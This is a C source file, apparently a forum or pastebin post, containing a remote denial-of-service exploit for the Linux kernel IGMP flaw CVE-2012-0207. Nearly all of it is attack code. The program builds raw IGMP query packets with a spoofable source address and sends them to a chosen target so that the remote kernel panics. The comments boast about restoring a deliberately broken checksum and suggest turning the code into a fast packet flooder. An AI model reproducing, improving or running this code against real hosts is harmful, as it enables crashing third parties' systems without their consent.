fuckfd.c

1. /*
2. ** linux-undeadattack.c
3. ** Linux IGMP Remote Denial Of Service (Introduced in linux-2.6.36)
4. ** CVE-2012-0207
5. ** credits to Ben Hutchings:
6. ** http://womble.decadent.org.uk/blog/igmp-denial-of-service-in-linux-cve-2012-0207.html
7. ** THIS code wich can attack NOT just LAN, is NOT kcopes and, is based more on the ICMPv3 membership query bug... wich was for windows but also affects linux, in IMPv3 tho :P go figure... anyhow, this can now be easily made into a very fast packet machine ,and since it doesnt care what the ips are, i guess could be seen results, remotely... feel free to update/send in comment... all comments, go thru ME, XD , before any type of publishing, so be sure that codes are safe and, i only put here, corrected codes...simple... so, please dont go adding it to your lame d0s collection coz, ill just fark it up , and, i mean, the packet is easy to block since it is released...right
8. ** Example:
9. ** ./undeadattack SRC_IP DST_IP
10. ** The Linux Kernel at the remote side will Panic
11. ** when sent over the network -still in testing!
12. */
13. #include <stdio.h>
14. #include <string.h>
15. #include <stdlib.h>
16. #include <netinet/in.h>
17. #include <netdb.h>
18. #include <sys/time.h>
19. #include <sys/types.h>
20. #include <sys/socket.h>
21. #include <arpa/inet.h>
22. #include <unistd.h>
23.  
24. struct iphdr {
25.   unsigned char ihl:4, version:4, tos;
26.   unsigned short tot_len, id, frag_off;
27.   unsigned char ttl, protocol;
28.   unsigned short check;
29.   unsigned int saddr, daddr;
30.   unsigned int options1;
31.   unsigned int options2;
32. };
33.  
34. struct igmp_query {
35.         unsigned char type;
36.         unsigned char maxresponse;
37.         unsigned short csum;
38.         unsigned int mcast;
39.         char padding[40];
40. };
41.  
42. // unsigned short in_chksum(unsigned short *, int);  // removed by xd , thx for trying to cripple but no work
43.  
44. unsigned short in_chksum(unsigned short *addr, int len);         // this was crippled, notice that this was uptop, so you dd not see the
45.                                                                  // bugged up in_chksum wich wont make this works :) NOW try it.
46. unsigned short in_chksum(unsigned short *addr, int len) {
47.    register int nleft = len;
48.    register int sum = 0;
49.    u_short answer = 0;
50.    while (nleft > 1) {
51.       sum += *addr++;
52.       nleft -= 2;
53.    }
54.    if (nleft == 1) {
55.       *(u_char *)(&answer) = *(u_char *)addr;
56.       sum += answer;
57.    }
58.    sum = (sum >> 16) + (sum & 0xffff);
59.    sum += (sum >> 16);
60.    answer = ~sum;
61.    return(answer);
62. }
63.  
64. long resolve(char *);
65. long resolve(char *host) {
66.   struct hostent *hst;
67.   long addr;
68.   hst = gethostbyname(host);
69.   if (hst == NULL)
70.     return(-1);
71.   memcpy(&addr, hst->h_addr, hst->h_length);
72.   return(addr);
73. }
74.  
75. int main(int argc, char *argv[]) {
76.   struct sockaddr_in dst;
77.   struct iphdr *ip;
78.   struct igmp_query *igmp;
79.   long daddr, saddr;
80.   int s, i=0, c, len, one=1;
81.   char buf[1500];
82.   if (argc < 3) {
83.    printf("Linux IGMP Remote Denial Of Service (Introduced in linux-2.6.36)\n"
84.   "credits to Ben Hutchings but this is NOT kcopes code nor firestorms so, author stays anon\n");
85.    printf("Usage: %s <src ip> <dst ip>\n", *argv); // yea, try any ip and see, i guess its worth a shot... or not :P
86.     return(1);
87.   }
88.   daddr = resolve(argv[2]);
89.   saddr = resolve(argv[1]);
90.   memset(buf, 0, 1500);
91.   ip = (struct iphdr *)&buf;
92.   igmp = (struct igmp_query*)&buf[sizeof(struct iphdr)];
93.   dst.sin_addr.s_addr = daddr;
94.   dst.sin_family = AF_INET;
95.   ip->ihl = 7;
96.   ip->version = 4;
97.   ip->tos = 0;
98.   ip->tot_len = htons(sizeof(struct iphdr)+8);
99.   ip->id = htons(18277);
100.   ip->frag_off=0;
101.   ip->ttl = 1;
102.   ip->protocol = IPPROTO_IGMP;
103.   ip->check = in_chksum((unsigned short *)ip, sizeof(struct iphdr));
104.   ip->saddr = saddr;
105.   ip->daddr = daddr;
106.   ip->options1 = 0;
107.   ip->options2 = 0;
108.   igmp->type = 0x11;
109.   igmp->maxresponse = 0xff;
110.   igmp->mcast=inet_addr("0.0.0.0"); // mod here,NOW we can attack the IP we actually put in,or feelfree to use 224.0.0.0.Your choice,see that word kcope 'choice' Joberheldie, you should also learn this word. look it up on wikipedia.
111.   igmp->csum = 0;
112.   igmp->csum=in_chksum((unsigned short *)igmp, 8);
113.   s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
114.   if (s == -1)
115.   return(1);
116.   printf("Sending IGMP packet: %s -> %s\n", argv[1], argv[2]);
117.   if (sendto(s,&buf,sizeof(struct iphdr)+8,0,(struct sockaddr *)&dst,sizeof(struct sockaddr_in)) == -1) {
118.  perror("Error sending");
119.   exit(-1);
120.   }
121.   close(s);
122.   s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW); // MUST be root for this yes..thats NO cripple
123.   if (s == -1)
124.   return(1);
125.   ip->id = htons(18278);
126.   ip->tot_len = sizeof(struct iphdr)+12;
127.   igmp->type = 0x11;
128.   igmp->maxresponse = 0;
129.   igmp->mcast=inet_addr("0.0.0.0");
130.   igmp->csum = 0;
131.   igmp->csum=in_chksum((unsigned short *)igmp, 12);
132.   printf("Sending: %s -> %s\n", argv[1], argv[2]);
133.   if (sendto(s,&buf,sizeof(struct iphdr)+12,0,(struct sockaddr *)&dst,sizeof(struct sockaddr_in)) == -1) {
134.        perror("Error sending");
135.         exit(-1);
136.       }
137.   return(0);
138. }